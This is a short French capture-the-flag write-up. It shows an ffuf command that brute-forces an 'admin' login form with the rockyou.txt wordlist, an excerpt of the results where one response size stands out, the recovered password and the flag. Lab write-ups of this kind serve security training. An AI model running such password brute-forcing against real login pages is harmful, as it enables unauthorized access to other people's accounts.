Bruteforce
Consignes
Utilisez "rockyou.txt" !
Réalisation
J'ai utilisé ffuf pour réaliser le bruteforce. Je suis parti du principe que le user était "admin". J'ai donc fais un bruteforce sur le mdp avec Rockyou.
Voici la commande avec laquelle j'ai réalisé le bruteforce:
ffuf -w /usr/share/wordlists/rockyou.txt -u http://LienVersLeCTF/login -X POST -d "username=admin&password=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -fc 401,403Ceci m'a retourné alors chacun des tests réalisés. Parmi ces tests, une ligne s'est démarquée:
panther [Status: 200, Size: 797, Words: 307, Lines: 23, Duration: 18ms] dinamo [Status: 200, Size: 797, Words: 307, Lines: 23, Duration: 18ms] mommy [Status: 200, Size: 797, Words: 307, Lines: 23, Duration: 23ms] juliana [Status: 200, Size: 797, Words: 307, Lines: 23, Duration: 19ms] trustno1 [Status: 200, Size: 797, Words: 307, Lines: 23, Duration: 22ms] cassandra [Status: 200, Size: 78, Words: 6, Lines: 1, Duration: 23ms] sexylady [Status: 200, Size: 797, Words: 307, Lines: 23, Duration: 20ms] autumn [Status: 200, Size: 797, Words: 307, Lines: 23, Duration: 21ms] 14344 [Status: 200, Size: 797, Words: 307, Lines: 23, Duration: 21ms] mendoza [Status: 200, Size: 797, Words: 307, Lines: 23, Duration: 17ms]
Je me connecte donc sur le site en tant que admin:cassandra
Une fois connecté, nous obtenons le FLAG :
2600{rJW_h000m2kUi0q9u-X9GA}Last updated